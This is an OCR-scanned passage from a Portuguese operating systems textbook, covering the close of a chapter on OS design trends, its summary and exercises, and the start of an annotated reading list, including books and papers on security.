phones. Continuando essa tendência, seus sistemas 
operacionais terão de ser muito diferentes dos atuais, 
para lidar com todas essas demandas. Além disso, eles 
terão de balancear o consumo de energia e “se manter 
frescos”. A dissipação de calor e o consumo de energia 
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são alguns dos desafios mais importantes, até mesmo 
em computadores de alto nível. 

Contudo, um segmento que está crescendo ainda 
mais rápido no mercado é o de computadores movidos a 
bateria, incluindo notebooks, netbooks, tablets e smart- 
phones. A maioria deles possui conexões sem fio para o 
mundo externo. Eles precisam de sistemas operacionais 
menores, mais rápidos, mais flexíveis e mais confiáveis 
do que os sistemas operacionais em dispositivos maio- 
res. Vários desses dispositivos são baseados em siste- 
mas operacionais tradicionais, como Linux, Windows 
e OS X, mas com modificações significativas. Além 
disso, eles normalmente usam uma solução baseada em 
microkernel/hipervisor para gerenciar a pilha de comu- 
nicação por rádio. 

Esses sistemas operacionais terão de tratar dispositi- 
vos totalmente conectados (isto é, com fio), fracamente 
conectados (isto é, sem fio) e desconectados — incluin- 
do os dados acumulados durante o período de desliga- 
mento e a resolução de consistência quando religados 
— melhor do que os sistemas atuais. No futuro, eles 
também precisarão enfrentar os problemas de mobili- 
dade melhor do que os sistemas atuais (por exemplo, 
localizar uma impressora a laser, conectar-se a ela e en- 
viar um arquivo via ondas de rádio). O gerenciamento 
de energia será essencial, incluindo diálogos extensi- 
vos entre o sistema operacional e as aplicações sobre 
a quantidade de energia restante na bateria e como ela 
pode ser mais bem usada. A adaptação dinâmica das 
aplicações para tratar as limitações de pequenas telas de 
vídeo é algo importante. Por fim, novos modos de en- 
trada e saída, incluindo escrita à mão e fala, podem pre- 
cisar de novas técnicas nos sistemas operacionais para 


12.7 Resumo 


O projeto de um sistema operacional tem início com 
a determinação daquilo que ele deve fazer. É desejável 
que a interface seja simples, completa e eficiente. De- 
vem existir paradigmas nítidos da interface do usuário, 
da execução e dos dados. 

O sistema precisa ser bem estruturado, usando uma 
das várias técnicas conhecidas, como estruturação em 
camadas ou cliente-servidor. Os componentes internos 
precisam ser ortogonais uns aos outros e separar clara- 
mente a política do mecanismo. Uma análise adequada 
tem de ser feita para questões como estruturas de dados 
estáticas versus dinâmicas, nomeação, momento de as- 
sociação e ordem de implementação dos módulos. 

O desempenho é importante, mas as otimizações de- 
vem ser escolhidas cuidadosamente para não arruinar a 


melhorar a qualidade. É provável que o sistema opera- 
cional para um computador portátil, movido a bateria, 
sem fio e operado por voz seja muito diferente daquele 
de um desktop com 16 núcleos de CPU de 64 bits e uma 
conexão de rede de fibra ótica com taxa de transmissão 
na ordem de gigabits. E, obviamente, existirão inúmeras 
máquinas híbridas com suas próprias necessidades. 


12.6.6 Sistemas embarcados 


Uma área final na qual novos sistemas operacionais 
vão proliferar é a de sistemas embarcados. Os sistemas 
operacionais dentro de lavadoras, fornos de micro- 
-ondas, bonecas, rádios, aparelhos de MP3, câmeras de 
vídeo, elevadores e marca-passos serão diferentes de 
todos os citados anteriormente e é bem provável que 
também sejam diferentes uns dos outros. Cada um será 
projetado com cuidado para suas aplicações especifi- 
cas, visto que é improvável que alguém vá conectar um 
cartão PCI em um marca-passo para transformá-lo em 
um controlador de elevador. Visto que todos os sistemas 
embarcados executam somente um número limitado de 
programas, conhecidos no momento do projeto, será 
possível fazer otimizações hoje impensáveis nos siste- 
mas de propósito geral. 

Uma ideia promissora para os sistemas embarcados 
é a de sistemas operacionais extensíveis (por exemplo, 
Paramecium e Exokernel), que podem ser feitos tão le- 
ves ou pesados quanto a aplicação em questão exigir, 
porém de um modo consistente entre as aplicações. Vis- 
to que os sistemas embarcados serão produzidos às cen- 
tenas de milhões, esse será um mercado fundamental 
para novos sistemas operacionais. 


estrutura do sistema. Muitas vezes é bom que sejam feitas 
ponderações sobre espaço-tempo, uso de caches, dicas, 
exploração de localidade e otimização do caso comum. 

Escrever um sistema com algumas pessoas é diferen- 
te de produzir um grande sistema com 300 pessoas. No 
segundo caso, a estrutura da equipe e o gerenciamento 
do projeto desempenham um papel crucial ao sucesso 
ou fracasso do projeto. 

Por fim, os sistemas operacionais estão mudando para 
seguir novas tendências e atender a novos desafios, que 
podem incluir sistemas baseados em hipervisores, siste- 
mas multinúcleo, espaços de endereçamento de 64 bits, 
computadores portáteis sem fio e sistemas embarcados. 
Não há dúvida de que os próximos anos serão bem ani- 
mados para os projetistas de sistemas operacionais. 


PROBLEMAS 


1. 


A lei de Moore descreve um fenômeno de crescimento 
exponencial semelhante ao crescimento populacional de 
uma espécie animal introduzida em um novo ambiente 
com comida abundante e nenhum inimigo natural. Na 
natureza, uma curva de crescimento exponencial tem 
probabilidade de, ao final, tornar-se uma curva sigmoide 
com um limite assintótico quando o suprimento de co- 
mida se tornar limitante ou os predadores aprenderem 
a tirar vantagem da nova presa. Discuta alguns fatores 
capazes de limitar a taxa de melhoras do hardware do 
computador. 

Na Figura 12.1, dois paradigmas são mostrados: orienta- 
dos a algoritmos e a eventos. Para cada um dos seguintes 
tipos de programas, qual paradigma provavelmente é o 
mais fácil de usar? 

(a) Um compilador. 

(b) Um programa de edição de imagem. 

(c) Um programa de folha de pagamento. 

Os nomes de arquivo hierárquicos sempre começam no 
topo da árvore. Considere, por exemplo, o nome de ar- 
quivo /usr/ast/books/mos2/chap-12 em vez de chap-12/ 
mos2/books/ast/usr. Ao contrário, os nomes DNS come- 
çam na parte de baixo da árvore e continuam subindo. 
Existe algum motivo fundamental para essa diferença? 
A teoria de Corbató diz que o sistema deveria forne- 
cer um mecanismo mínimo. Eis uma lista de chamadas 
POSIX que também estavam presentes na versão 7 do 
UNIX. Quais são redundantes, isto é, quais poderiam ser 
removidas sem perda de funcionalidade, porque combi- 
nações simples de outras chamadas seriam capazes de 
fazer o mesmo trabalho com desempenho equivalente? 
Access, alarm, chdir, chmod, chown, chroot, close, 
creat, dup, exec, exit, fcntl, fork, fstat, ioctl, kill, link, 
Iseek, mkdir, mknod, open, pause, pipe, read, stat, 
time, times, umask, unlink, utime, wait e write. 
Suponha que as camadas 3 e 4 na Figura 12.2 fossem 
trocadas. Que implicações isso teria para o projeto do 
sistema? 

Em um sistema cliente-servidor baseado em microker- 
nel, este apenas realiza a troca de mensagens e nada 
mais. Apesar disso, é possível aos processos do usuá- 
rio criarem e usarem semáforos? Em caso afirmativo, 
como? Caso contrário, por que não? 

Otimizações cuidadosas podem melhorar o desempe- 
nho das chamadas de sistema. Considere o caso no qual 
uma chamada de sistema seja feita a cada 10 ms. O tem- 
po médio de uma chamada é de 2 ms. Se as chamadas 
de sistema podem ser aceleradas por um fator de dois, 
quanto tempo leva agora um processo que levava 10 s 
para executar? 


8. 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 
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Os sistemas operacionais muitas vezes fazem nomeação 
em dois níveis diferentes: externo e interno. Quais são as 
diferenças entre esses nomes com relação a: 

(a) Tamanho 

(b) Unicidade 

(c) Hierarquia 

Uma maneira de tratar tabelas cujos tamanhos não são 
conhecidos antecipadamente é fazê-las de tamanhos fi- 
xos, mas, quando alguma estiver cheia, para substituí-la 
por uma maior, copiar as entradas antigas para a nova e, 
depois, liberar a antiga. Quais as vantagens e as desvan- 
tagens de fazer uma nova tabela 2x o tamanho da tabela 
original, comparado com fazê-la somente 1,5x? 

Na Figura 12.5, um flag, found, é empregado para di- 
zer se o PID foi localizado. Seria possível desconsiderar 
found e simplesmente testar p no final do laço, verifican- 
do se ele atinge ou não o final? 

Na Figura 12.6, as diferenças entre o x86 e o Ultra- 
SPARC são escondidas pela compilação condicional. 
Poderia essa mesma prática ser usada para esconder as 
diferenças entre máquinas x86 com um único disco IDE 
e máquinas x86 com um único disco SCSI? Seria uma 
boa ideia? 

A indireção é uma maneira de tornar um algoritmo mais 
flexível. Existem desvantagens nesse método? Em caso 
afirmativo, quais? 

Os procedimentos reentrantes podem ter variáveis glo- 
bais estáticas? Justifique sua resposta. 

A macro da Figura 12.7(b) é nitidamente mais eficiente 
do que o procedimento da Figura 12.7(a). Contudo, há 
uma desvantagem: é de difícil leitura. Existem outras 
desvantagens? Em caso afirmativo, quais são elas? 
Suponha que precisemos de um modo para calcular se o 
número de bits em uma palavra de 32 bits é par ou ím- 
par. Elabore um algoritmo para executar esse cálculo tão 
rápido quanto possível. Você pode usar até 256 KB de 
RAM para tabelas, se for necessário. Escreva uma ma- 
cro para executar seu algoritmo. Crédito extra: escreva 
um procedimento para fazer o cálculo por meio de um 
loop sobre os 32 bits. Calcule quantas vezes sua macro é 
mais rápida do que o procedimento. 

Na Figura 12.8, vemos como arquivos GIF usam valores 
de 8 bits para indexar uma palheta de cores. A mesma 
ideia pode ser empregada em uma palheta de cores de 16 
bits de largura. Em quais circunstâncias, se alguma, uma 
palheta de cores de 24 bits pode ser uma boa ideia? 
Uma desvantagem do GIF é que a imagem tem de incluir 
a palheta de cores, que aumenta o tamanho do arquivo. 
Qual é o tamanho mínimo de imagem para a qual uma 
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18. 


19. 


20. 


21. 


22. 


palheta de cores de 8 bits de largura apresenta vanta- 
gem? Agora repita a operação para uma palheta de cores 
de 16 bits de largura. 

No texto, discutimos como o uso de cache para os no- 
mes de caminhos pode resultar em um aumento consi- 
derável no desempenho durante a procura de nomes de 
caminhos. Outra técnica às vezes adotada consiste em 
ter um programa daemon que abre os arquivos no dire- 
tório-raiz, mantendo-os abertos, permanentemente, para 
forçar seus i-nodes a ficarem na memória durante todo o 
tempo. A fixação dos i-nodes — como essa — melhora 
ainda mais a procura do caminho? 

Mesmo que um arquivo remoto não tenha sido removi- 
do desde que uma dica foi registrada, ele pode ter sido 
modificado desde a última vez em que foi referenciado. 
Que outra informação pode ser útil registrar nele? 
Considere um sistema que acumula referências a arqui- 
vos remotos como dicas, por exemplo, do tipo (nome, 
host remoto, nome remoto). É possível que um arquivo 
remoto seja removido silenciosamente e depois substitu- 
ido. A dica pode, então, retornar o arquivo errado. Como 
esse problema pode ocorrer de maneira menos provável? 
No texto, afirma-se que a localidade muitas vezes pode 
ser explorada para melhorar o desempenho. Mas consi- 
dere um caso em que um programa lê a entrada de um 
arquivo-fonte e continuamente coloca a saída em dois 
ou mais arquivos. Uma tentativa de tirar vantagem da 
localidade no sistema de arquivos pode levar à redução 
da eficiência nesse caso? Existe algum modo de contor- 
nar isso? 

Fred Brooks afirma que um programador é capaz de es- 
crever mil linhas de código depurado por ano, ainda que 
a primeira versão do MINIX (13 mil linhas de código) 
tenha sido produzida por uma pessoa em menos de três 
anos. Como você explica essa discrepância? 


23. 


24. 


25. 


26. 


27. 


28. 


Usando a ideia de Brooks — mil linhas de código por 
programador ao ano —, faça uma estimativa da quanti- 
dade de dinheiro gasto para produzir o Windows 8. Su- 
ponha que um programador custe cem mil dólares por 
ano (incluindo custos associados, como computadores, 
espaço de trabalho, suporte de secretaria e gerenciamen- 
to). Você considera plausível esse valor encontrado? Em 
caso negativo, o que poderia estar errado? 

Como a memória está ficando cada vez mais barata, al- 
guém poderia pensar em um computador com uma gran- 
de RAM alimentada com bateria em vez de um disco 
rígido. Em preços atuais, qual seria o custo de um PC 
simples com base somente em RAM? Suponha que um 
disco de RAM de 100 GB seja suficiente para uma má- 
quina simples. Existe a probabilidade de essa máquina 
ser competitiva? 

Cite algumas características de um sistema operacional 
convencional que não são necessárias em um sistema 
embarcado usado dentro de um eletrodoméstico. 
Escreva um procedimento em C para fazer uma adição 
em precisão dupla sobre dois parâmetros dados. Escre- 
va o procedimento usando compilação condicional, de 
modo que funcione em máquinas de 16 bits e também 
em máquinas de 32 bits. 

Escreva versões de um programa que insira pequenas 
cadeias de caracteres geradas aleatoriamente em um ve- 
tor e que permita depois a procura de uma dada cadeia 
dentro desse vetor considerando (a) uma pesquisa linear 
simples (força bruta) e (b) um método mais sofisticado 
à sua escolha. Recompile seus programas para tamanhos 
de vetores variando de pequeno até o maior tamanho que 
você possa tratar em seu sistema. Avalie o desempenho 
de todas as abordagens. Onde está o ponto de equilíbrio? 
Escreva um programa para simular um sistema de arqui- 
vos em memória. 


CAPÍTULO 


13 





os 12 capítulos anteriores abordamos uma varieda- 

de de tópicos. Este é destinado a ajudar o leitor in- 

teressado em aprofundar seus estudos de sistemas 

operacionais. A Seção 13.1 apresenta uma lista de 

sugestões de leitura. A Seção 13.2 traz uma biblio- 
grafia, ordenada alfabeticamente, de todos os livros e 
artigos citados neste livro. 

Além das referências dadas a seguir, o ACM Sym- 
posium on Operating Systems Principles (SOSP), orga- 
nizado nos anos ímpares, e o USENIX Symposium on 
Operating Systems Design and Implementation (OSDI), 
organizado nos anos pares, sao boas fontes para procu- 
rar artigos recentes sobre sistemas operacionais. Além 
desses, a Eurosys Conference acontece anualmente e é 
uma ótima vitrine de trabalhos de primeira classe. Os 
periódicos ACM Transactions on Computer Systems e 
ACM SIGOPS Operating Systems Review muitas ve- 
zes publicam artigos relevantes. Muitas outras confe- 
rências da ACM, IEEE e USENIX tratam de tópicos 
especializados. 


13.1 Sugestões de leituras adicionais 


Nesta seção, há algumas sugestões de leituras 
adicionais. Diferentemente dos artigos citados nas 
seções intituladas “Pesquisas em...” no texto, que 
tratam de pesquisas atuais, essas referências são de 
natureza principalmente introdutória ou tutorial. En- 
tretanto, podem servir para apresentar o material des- 
te livro de uma perspectiva diferente ou com outra 
ênfase. 





13.1.1 Trabalhos introdutórios e gerais 


Silberschatz et al., Fundamentos de sistemas operacio- 
nais, 9. ed. 


Um livro-texto geral sobre sistemas operacionais. 
Aborda processos, gerenciamento de memória, geren- 
ciamento de armazenamento, proteção e segurança, 
sistemas distribuídos e alguns sistemas com propósitos 
especiais. Dois estudos de caso são apresentados: Linux 
e Windows 7. A capa é ilustrada com dinossauros. Estes 
são animais legados, enfatizando que os sistemas opera- 
cionais também carregam muito material legado. 


Stallings, Operating Systems, 7. ed. 


Também sobre sistemas operacionais, esse livro 
aborda todos os tópicos tradicionais e inclui algum ma- 
terial sobre sistemas distribuídos. 


Stevens e Rago, Advanced Programming in the UNIX 
Environment 


Esse livro diz como escrever programas em C que 
usam a interface de chamadas de sistema do UNIX e a 
biblioteca C padrão. Os exemplos são baseados no Sys- 
tem V Edição 4 e nas versões 4.4BSD do UNIX. A re- 
lação entre essas implementações e o POSIX é descrita 
em detalhes. 


Tanenbaum e Woodhull, Sistemas operacionais, projeto 
e implementação 

Um modo prático de aprender sobre sistemas opera- 
cionais. Esse livro discute os princípios básicos, mas tam- 
bém discute em detalhes um sistema operacional atual, o 
MINIX 3, e traz a listagem desse sistema como apêndice. 
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13.1.2 Processos e threads 


Arpaci-Dusseau e Arpaci-Dusseau, Operating Systems: 
Three Easy Pieces 

A primeira parte inteira é dedicada à virtualização da 
CPU para compartilhá-la com múltiplos processos. O 
melhor sobre esse livro (além do fato de que existe uma 
versão on-line gratuita) é que ele introduz não apenas 
os conceitos das técnicas de processamento e escalo- 
namento, mas também detalhes de APIs e chamadas de 
sistema como fork e exec. 


Andrews e Schneider, “Concepts and Notations for 
Concurrent Programming” 


Tutorial e apanhado geral sobre processos e comuni- 
cação entre processos, incluindo espera ocupada, semá- 
foros, monitores, troca de mensagens e outras técnicas. 
O artigo também mostra como esses conceitos são inse- 
ridos em várias linguagens de programação. O artigo é 
antigo, mas resistiu bem ao tempo. 


Ben-Ari, Principles of Concurrent Programming 


Esse pequeno livro é totalmente direcionado a pro- 
blemas de comunicação entre processos. Existem capí- 
tulos sobre exclusão mútua, semáforos, monitores e o 
problema do jantar dos filósofos, entre outros. 


Zhuravlev et al., “Survey of Scheduling Techniques for 
Addressing Shared Resources in Multicore Processors” 


Sistemas multinúcleos começaram a dominar o 
campo do mundo da computação de uso geral. Um 
dos desafios mais importantes é a disputa por recursos 
compartilhados. Nesse apanhado geral, os autores apre- 
sentam diferentes técnicas de escalonamento para o tra- 
tamento desse tipo de disputa. 


Silberschatz et al., Fundamentos de sistemas operacio- 
nais, 9. ed. 


Os capítulos 3 a 6 abordam processos e comunicação 
entre processos, incluindo escalonamento, seções críti- 
cas, semáforos, monitores e os problemas clássicos de 
comunicação entre processos. 


Stratton et al., “Algorithm and data optimization techni- 
ques for scaling to massively threaded systems” 


A programação de um sistema com meia dúzia de 
threads é bastante difícil. Mas o que acontece quando 
você tem milhares deles? Dizer que fica complicado é 
muito pouco. Esse artigo explica as técnicas que estão 
sendo utilizadas. 


13.1.3 Gerenciamento de memória 


Denning, “Virtual Memory” 

Um artigo clássico sobre muitos aspectos de memó- 
ria virtual. Denning foi um dos pioneiros nessa área e o 
inventor do conceito de conjunto de trabalho. 


Denning, “Working Sets Past and Present” 


Uma boa revisão de diversos algoritmos de gerencia- 
mento de memória e paginação. Inclui uma bibliografia 
abrangente. Embora muitos artigos sejam antigos, os 
princípios abordados permanecem os mesmos. 


Knuth, The Art of Computer Programming, v. 1 


O livro discute e compara algoritmos de gerencia- 
mento de memória, como o primeiro encaixe (first fit), 
o melhor encaixe (best fit) e outros. 


Arpaci-Dusseau e Arpaci-Dusseaum “Operating Sys- 
tems: Three Easy Pieces” 

Esse livro possui uma rica seção sobre memória vir- 
tual nos capítulos de 12 a 23, incluindo uma excelente 
revisão das políticas de substituição de página. 


13.1.4 Sistemas de arquivos 


McKusick et al., “A Fast File System for UNIX” 


O sistema de arquivos do UNIX foi completamen- 
te refeito para o 4.2 BSD. Esse artigo descreve o pro- 
jeto do novo sistema de arquivos, com ênfase em seu 
desempenho. 


Silberschatz et al., Fundamentos de sistemas operacio- 
nais, 9. ed. 

Os Capítulos 10 a 12 tratam de hardware de arma- 
zenamento e sistemas de arquivos. Eles cobrem as ope- 
rações sobre arquivos, interfaces, métodos de acesso, 
diretórios e implementação, entre outros tópicos. 


Stallings, Operating systems, 7. ed. 


O Capítulo 12 contém uma quantidade razoável de 
material sobre sistemas de arquivos e um pouco sobre 
sua segurança. 


Cornwell, “Anatomy ofa Solid-state Drive” 


Se você estiver interessado em unidades em estado 
sólido (SSDs — solid state drives), essa introdução de 
Michael Cornwell é um bom ponto de partida. Particu- 
larmente, o autor descreve, de maneira breve, o modo 
como as unidades tradicionais diferem das SSDs. 


13.1.5 Entrada/saída 


Geist e Daniel, “A Continuum of Disk Scheduling 
Algorithms” 


Apresenta um algoritmo de escalonamento de disco 
generalizado. Relata simulações abrangentes e mostra 
resultados experimentais. 


Scheible, “A Survey of Storage Options” 


Hoje existem muitas maneiras de armazenar bits: 
DRAM, SRAM, SDRAM, memória flash, disco rígido, 
disco flexível, CD-ROM, DVD, fita e muitos outros. 
Nesse artigo, são analisadas diferentes tecnologias e lis- 
tados seus pontos fortes e fracos. 


Stan e Skadron, “Power-Aware Computing” 


Até que alguém consiga aplicar a lei de Moore às 
baterias, o uso de energia vai continuar a ser uma ques- 
tão importante nos dispositivos móveis. Energia e calor 
são tão críticos hoje que os sistemas operacionais estão 
cientes da temperatura da CPU e adaptam seu compor- 
tamento a ela. Esse artigo investiga algumas questões e 
serve de ponto de partida para outros cinco artigos nessa 
edição especial da Computer sobre computação ciente 
do consumo (power-aware). 


Swanson e Caulfield, “Refactor, Reduce, Recycle: Res- 
tructuring the I/O stack for the Future of Storage” 


Os discos existem por dois motivos: quando a ener- 
gia é desligada, a memória RAM perde seu conteúdo. 
Além disso, os discos são muito grandes. Mas suponha 
que a RAM não perdesse seu conteúdo quando fosse 
desligada. Como isso mudaria a pilha de E/S? A memó- 
ria não volátil já é usada, e esse artigo examina como 
ela muda os sistemas. 


Ion, “From Touch Displays to the Surface: A Brief His- 
tory of Touchscreen Technology” 


Telas sensíveis ao toque rapidamente se tornaram 
onipresentes. O artigo acompanha a história dessas telas 
através do tempo, com explicações fáceis de entender e 
belas imagens e vídeos. Um material fascinante! 


Walker e Cragon, “Interrupt Processing in Concurrent 
Processors” 


A implementação de interrupções precisas em pro- 
cessadores superescalares é uma atividade desafiadora. 
O segredo é serializar o estado e fazê-lo rapidamente. 
Várias questões e ponderações sobre projetos são discu- 
tidas nesse artigo. 
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13.1.6 Impasses 


Coffman et al., “System Deadlocks” 


Uma breve introdução sobre impasses, suas causas e 
como eles podem ser evitados ou detectados. 


Holt, “Some Deadlock Properties of Computer Systems” 


Discussão sobre impasses. Holt introduz um modelo 
de grafo dirigido que pode ser usado para analisar algu- 
mas situações de impasses. 


Isloor e Marsland, “The Deadlock Problem: An Overview” 


Um tutorial sobre impasses, com ênfase especial em 
sistemas de banco de dados, com uma variedade de mo- 
delos e algoritmos. 


Levine, “Defining Deadlock” 


No Capítulo 6 deste livro, abordamos os impasses 
sobre recursos, mas pouca coisa sobre outros tipos. Esse 
artigo indica que, na literatura, foram usadas diversas 
definições, diferindo de formas sutis. O autor, então, 
examina os impasses na comunicação, no escalonamen- 
to e intercalados, apresentando um novo modelo que 
tenta abranger todos eles. 


Shub, “A Unified Treatment of Deadlock” 


Esse pequeno tutorial resume as causas dos impasses 
e suas soluções e sugere o que deve ser enfatizado quan- 
do o tópico for ensinado aos alunos. 


13.1.7 Virtualização e a nuvem 


Portnoy, “Virtualization Essentials” 


Uma introdução leve à virtualização. Ela aborda o 
contexto (incluindo a relação entre virtualização e a nu- 
vem) e trata de diversas soluções (com um pouco mais 
de ênfase no VMware). 


Erl et al., Cloud Computing: Concepts, Technology & 
Architecture 

Um livro dedicado à computação em nuvem no sentido 
amplo. Os autores explicam, detalhadamente, o que está es- 
condido por trás de acrônimos como IAAS, PAAS, SAAS 
e membros semelhantes da família “X” As A Service. 


Rosenblum e Garfinkel, “Virtual Machine Monitors: 
Current Technology and Future Trends” 

Esse artigo começa pela história dos monitores de 
máquinas virtuais e passa à discussão do estado atual 
da CPU, da memória e da virtualização da E/S. Em 
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particular, ele trata das áreas problemáticas relaciona- 
das com todos esses temas e fala sobre como os futuros 
equipamentos podem minimizar os problemas. 


Whitaker et al., “Rethinking the design of virtual ma- 
chine monitors” 


Muitos computadores possuem aspectos bizarros e 
difíceis de serem virtualizados. Nesse artigo, os auto- 
res do sistema Denali defendem a paravirtualização, ou 
seja, alterar o sistema operacional hóspede para evitar 
o uso de características bizarras de modo que elas não 
precisem ser emuladas. 


13.1.8 Sistemas de múltiplos processadores 


Ahmad, “Gigantic Clusters: Where Are They and What 
Are They Doing?” 

Esse é um bom livro para se ter uma ideia do nível 
de desenvolvimento atual dos grandes multicomputado- 
res. Ele descreve a ideia e apresenta uma visão geral de 
alguns grandes sistemas em funcionamento atualmente. 
Considerando a lei de Moore, não é de surpreender que 
os tamanhos mencionados nesse livro dupliquem a cada 
dois anos. 


Dubois et al., “Synchronization, Coherence, and Event 
Ordering in Multiprocessors” 


Um tutorial sobre sincronização em sistemas mul- 
tiprocessadores de memória compartilhada. Contudo, 
algumas das ideias são igualmente aplicáveis a mono- 
processadores e sistemas de memória distribuída. 


Geer, “For Programmers, Multicore Chips Mean Multi- 
ple Challenges” 


Os chips multicore (multinúcleo) já são uma reali- 
dade — independentemente de o pessoal do software 
estar preparado para isso ou não. Ao que parece, eles 
não estão prontos, e a programação desses processado- 
res oferece muitos desafios, que variam desde a escolha 
da ferramenta certa e a divisão do trabalho em pequenos 
pedaços até o teste dos resultados. 


Kant e Mohapatra, “Internet Data Centers” 


Os centros de processamento de dados da internet 
são multicomputadores potentes funcionando “com es- 
teroides”. Eles geralmente contêm dezenas ou centenas 
de milhares de computadores trabalhando em uma única 
aplicação. Escalabilidade, manutenção e uso de energia 
são questões importantes. Esse artigo é uma introdução 
ao tema e serve de ponto de partida para quatro artigos 
adicionais sobre o mesmo assunto. 


Kumar et al., “Heterogeneous Chip Multiprocessors” 


Os processadores multinúcleo utilizados nos compu- 
tadores desktop são simétricos — todos os núcleos são 
idênticos. Entretanto, para algumas aplicações, os pro- 
cessadores multinúcleo heterogêneos são frequentes e 
existem para cálculo, decodificação de vídeo e de áudio 
etc. Esse artigo discute algumas questões relacionadas 
aos CMPs heterogêneos. 


Kwok e Ahmad, “Static Scheduling Algorithms for 
Allocating Directed Task Graphs to Multiprocessors” 


O escalonamento ótimo de trabalho em um multi- 
computador ou multiprocessador é possível quando as 
características de todas as tarefas são conhecidas de an- 
temão. O problema é que o escalonamento ótimo leva 
muito tempo para ser realizado. Nesse artigo, os autores 
discutem e comparam 27 algoritmos conhecidos para 
atacar esse problema de diferentes maneiras. 


Zhuravlev et al., “Survey of Scheduling Techniques for 
Addressing Shared Resources in Multicore Processors” 


Como já dissemos, um dos desafios mais impor- 
tantes nos sistemas multiprocessadores é a disputa por 
recursos compartilhados. Esta visão geral apresenta di- 
versas técnicas de escalonamento diferentes para tratar 
dessa disputa. 


13.1.9 Segurança 


Anderson, Security Engineering, 2. ed. 


Um livro maravilhoso que explica claramente como 
construir sistemas confiáveis e seguros, por um dos 
pesquisadores mais conhecidos nessa área. Essa não é 
apenas uma visão fascinante dos muitos aspectos da se- 
gurança (incluindo técnicas, aplicações e aspectos orga- 
nizacionais), mas também está disponível gratuitamente 
on-line. Não há desculpas para não o ler. 


Van der Veen et al., “Memory Errors: the Past, the Pre- 
sent, and the Future” 


Uma visão histórica sobre erros de memória (in- 
cluindo transbordamentos do buffer, ataques à cadeia 
de formato, ponteiros forjados e muitos outros), que 
inclui ataques e defesas, ataques que evitam essas de- 
fesas, novas defesas que impedem os ataques que evi- 
tam as defesas anteriores, e... bem, de qualquer forma, 
você entendeu a ideia. Os autores mostram que, apesar 
de sua idade avançada e do aumento de outros tipos de 
ataque, os erros de memória continuam sendo um vetor 
de ataque extremamente importante. Além do mais, eles 


argumentam que essa situação provavelmente não mu- 
dará tão cedo. 


Bratus, “What Hackers Learn That the Rest of Us Don’t” 


O que faz dos hackers pessoas diferentes? Quais as- 
pectos são importantes para eles, mas não são para pro- 
gramadores regulares? Eles têm atitudes diferentes em 
relação a APIs? Casos fora do comum são importantes? 
Ficou curioso? Então, leia. 


Bratus et al., “From Buffer Overflows to Weird Machi- 
nes and Theory of Computation” 


Conectando o humilde transbordamento de buffer a 
Alan Turing. Os autores mostram que os hackers codifi- 
cam programas vulneráveis como máquinas esquisitas 
com conjuntos de instruções de aparência estranha. Ao 
fazer isso, eles fecham o círculo até a pesquisa inicial de 
Turing sobre “O que é computavel?”. 


Denning, Information Warfare and Security 


A informação se tornou uma arma de guerra, tanto 
militar quanto corporativa. Os envolvidos não só ten- 
tam atacar os sistemas de informações do outro lado, 
como também se proteger. Nesse livro fascinante, o 
autor aborda cada tópico relacionado com estratégias 
de defesa e ataque, desde dados disfarçados até fare- 
jadores de pacotes. Uma leitura obrigatória para qual- 
quer pessoa seriamente interessada em segurança de 
computadores. 


Ford e Allen, “How Not to Be Seen” 


Vírus, spyware, rootkits e sistemas de gerenciamen- 
to de direitos digitais têm grande interesse em esconder 
coisas. Esse artigo oferece uma breve introdução à ação 
furtiva em suas diversas formas. 


Hafner e Markoff, Cyberpunk 


Três casos de invasões a computadores espalhados 
pelo mundo — realizadas por jovens hackers — são 
descritos nesse material por um repórter do New York 
Times, que desvendou a história do verme na internet 
(Markoff). 


Johnson e Jajodia, “Exploring Steganography: Seeing 
the Unseen” 

A esteganografia tem uma longa historia, que vem 
desde a época em que o escritor raspava a cabeça de um 
mensageiro, tatuava uma mensagem na cabeça raspada 
e a enviava após o cabelo ter crescido. Apesar de as téc- 
nicas atuais serem muitas vezes “cabeludas”, elas são 
hoje digitais e possuem baixa latência. Esse é um bom 
material para uma introdução completa sobre o assunto 
e o modo como atualmente é praticada. 
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Ludwig, The little black book of email viruses 


Se vocé quer escrever programas antivirus e precisa 
saber em detalhes como os vírus funcionam, esse é um 
livro adequado. Todo tipo de vírus é discutido e os có- 
digos reais para a maioria deles também são fornecidos. 
Entretanto, é necessário ter conhecimento profundo so- 
bre a programação do x86 em linguagem assembly. 


Mead, “Who is Liable for Insecure Systems?” 


Embora a maior parte do trabalho relacionado à se- 
gurança de computadores trate do assunto a partir de 
uma perspectiva técnica, ela não é a única forma de 
abordar esse assunto. Suponha que os vendedores de 
software fossem legalmente responsáveis pelos danos 
causados por seu software problemático. É possível que 
a segurança atraísse muito mais a atenção dos forne- 
cedores do que hoje em dia, não? Intrigado com essa 
possibilidade? Leia esse artigo. 


Milojicic, “Security and Privacy” 
A segurança tem várias facetas, que incluem siste- 
mas operacionais, redes, questões de privacidade etc. 


Nesse artigo, seis especialistas em segurança são entre- 
vistados e explicam suas ideias sobre o assunto. 


Nachenberg, “Computer Virus-antivirus Coevolution” 


Logo que os desenvolvedores de antivírus descobri- 
ram como detectar e neutralizar algumas classes de ví- 
rus de computadores, os escritores de vírus começaram 
a aperfeiçoá-los. Esse artigo discute o jogo de gato e 
rato disputado pelos lados do vírus e do antivírus. O 
autor não é otimista no que se refere aos escritores de 
antivírus vencerem a guerra — uma má notícia para os 
usuários de computadores. 


Sasse, “Red-eye Blink, Bendy Shuffle, and the Yuck 
Factor: A User Experience of Biometric Airport 
Systems” 


O autor discute suas experiências com o sistema de 
reconhecimento da íris utilizado em um grande número 
de aeroportos. Nem todas são positivas. 


Thibadeau, “Trusted Computing for Disk Drives and 
Other Peripherals” 


Se você acha que uma unidade de disco é só um lo- 
cal onde bits são armazenados, repense essa ideia. Uma 
unidade de disco moderna possui uma CPU poderosa, 
megabytes de RAM, múltiplos canais de comunicação 
e até sua própria ROM de inicialização. Em suma, é um 
sistema computacional completo, pronto para o ataque, 
e que precisa de um sistema de proteção próprio. Esse 
artigo discute a segurança das unidades de disco. 
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13.1.10 Estudo de caso 1: UNIX, Linux e Android 


Bovet e Cesati, Understanding the Linux kernel 


Esse livro é provavelmente a melhor discussão geral 
sobre o núcleo do Linux. Ele aborda processos, geren- 
ciamento de memória, sistemas de arquivos, sinais e 
muito mais. 


IEEE, Information technology — Portable operating 
system interface (POSIX), Part 1: System application 
program interface (API) [C language] 


Esse é o padrão sobre o assunto. Algumas partes são 
de fato bem legíveis, especialmente o Anexo B, “Ratio- 
nale and Notes”, que muitas vezes esclarece o porquê de 
